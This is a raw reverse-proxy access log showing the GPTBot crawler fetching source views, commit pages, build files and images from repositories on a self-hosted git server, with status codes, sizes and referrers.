"https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" +[17/Feb/2026:19:54:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html?display=rendered" [Client 74.7.227.38] [Length 11184] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" +[17/Feb/2026:19:54:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html?display=rendered" [Client 74.7.227.38] [Length 11183] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" +[17/Feb/2026:19:54:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html?display=rendered" [Client 74.7.227.38] [Length 11184] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" +[17/Feb/2026:19:54:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt?display=source" [Client 74.7.227.38] [Length 11503] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" +[17/Feb/2026:19:54:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt?display=rendered" [Client 74.7.227.38] [Length 11237] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" +[17/Feb/2026:19:54:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs?display=source" [Client 74.7.227.38] [Length 11620] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" +[17/Feb/2026:19:54:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs?display=rendered" [Client 74.7.227.38] [Length 11221] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" +[17/Feb/2026:19:54:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html?display=source" [Client 74.7.227.38] [Length 492262] [Gzip 19.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" +[17/Feb/2026:19:54:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html?display=source" [Client 74.7.227.38] [Length 493062] [Gzip 19.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" +[17/Feb/2026:19:54:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html?display=source" [Client 74.7.227.38] [Length 474273] [Gzip 19.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" +[17/Feb/2026:19:54:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache?display=source" [Client 74.7.227.38] [Length 11376] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" +[17/Feb/2026:19:54:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs?display=source" [Client 74.7.227.38] [Length 12026] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" +[17/Feb/2026:19:54:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/css" [Client 74.7.227.38] [Length 10238] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/css" +[17/Feb/2026:19:54:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/html/assets/css" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/css" +[17/Feb/2026:19:54:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/html/assets/css" +[17/Feb/2026:19:54:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/assets/css" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/css" +[17/Feb/2026:19:54:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/assets/css" +[17/Feb/2026:19:54:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/assets/css" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/css" +[17/Feb/2026:19:54:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/assets/css" +[17/Feb/2026:19:54:21 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/static/css/style.css" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/templates/index.html" +[17/Feb/2026:19:54:22 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.diff" +[17/Feb/2026:19:54:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 74.7.227.38] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/branch/main/html/index.html" +[17/Feb/2026:19:54:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 74.7.227.38] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/branch/main/html/index.html" +[17/Feb/2026:19:54:24 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.diff" +[17/Feb/2026:19:54:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 74.7.227.38] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/branch/main/html/index.html" +[17/Feb/2026:19:54:25 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages/assets/css/style.css" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages/DCS.html" +[17/Feb/2026:19:54:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=html%2fassets%2fcss" [Client 74.7.227.38] [Length 23206] [Gzip 4.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/branch/main/html/assets/css" +[17/Feb/2026:19:54:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=html%2fassets%2fcss" [Client 74.7.227.38] [Length 22748] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/branch/main/html/assets/css" +[17/Feb/2026:19:54:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fassets%2fcss" [Client 74.7.227.38] [Length 24440] [Gzip 4.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/branch/main/html/assets/css" +[17/Feb/2026:19:54:27 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages/assets/css/style.css" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages/DCS.html" +[17/Feb/2026:19:54:28 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/assets/css/style.css" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/DCS.html" +[17/Feb/2026:19:54:28 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.diff" +[17/Feb/2026:19:54:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/css" [Client 74.7.227.38] [Length 10355] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static" +[17/Feb/2026:19:54:29 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/assets/css/style.css" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.diff" +[17/Feb/2026:19:54:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/css" [Client 74.7.227.38] [Length 10100] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets" +[17/Feb/2026:19:54:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 74.7.227.38] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/branch/main/.Backup/html/index.html" +[17/Feb/2026:19:54:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 74.7.227.38] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/branch/main/.Backup/html/index.html" +[17/Feb/2026:19:54:32 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages/assets/css/style.css" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages/DCS.html" +[17/Feb/2026:19:54:33 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages/assets/css/style.css" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages/DCS.html" +[17/Feb/2026:19:54:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/css" [Client 74.7.227.38] [Length 10077] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets" +[17/Feb/2026:19:54:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 74.7.227.38] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/branch/main/.Backup/html/index.html" +[17/Feb/2026:19:54:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/css" [Client 74.7.227.38] [Length 10044] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets" +[17/Feb/2026:19:54:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/css" [Client 74.7.227.38] [Length 10078] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets" +[17/Feb/2026:19:54:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/static/css" [Client 74.7.227.38] [Length 10052] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/css" +[17/Feb/2026:19:54:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/static/css" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/css" +[17/Feb/2026:19:54:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/static/css" +[17/Feb/2026:19:54:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/css" [Client 74.7.227.38] [Length 10308] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/css" +[17/Feb/2026:19:54:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/css" [Client 74.7.227.38] [Length 10379] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets" +[17/Feb/2026:19:54:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/css" [Client 74.7.227.38] [Length 10143] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static" +[17/Feb/2026:19:54:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/css" [Client 74.7.227.38] [Length 10130] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets" +[17/Feb/2026:19:54:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/css" [Client 74.7.227.38] [Length 10076] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets" +[17/Feb/2026:19:54:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/css" [Client 74.7.227.38] [Length 9858] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/css" +[17/Feb/2026:19:54:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/css" [Client 74.7.227.38] [Length 10135] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets" +[17/Feb/2026:19:54:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/css" [Client 74.7.227.38] [Length 9827] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/css" +[17/Feb/2026:19:54:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/css" [Client 74.7.227.38] [Length 9858] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/css" +[17/Feb/2026:19:54:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2fstatic%2fcss" [Client 74.7.227.38] [Length 60961] [Gzip 11.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/static/css" +[17/Feb/2026:19:54:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2fstatic%2fcss" [Client 74.7.227.38] [Length 34969] [Gzip 8.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/static/css" +[17/Feb/2026:19:54:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/css" [Client 74.7.227.38] [Length 10071] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 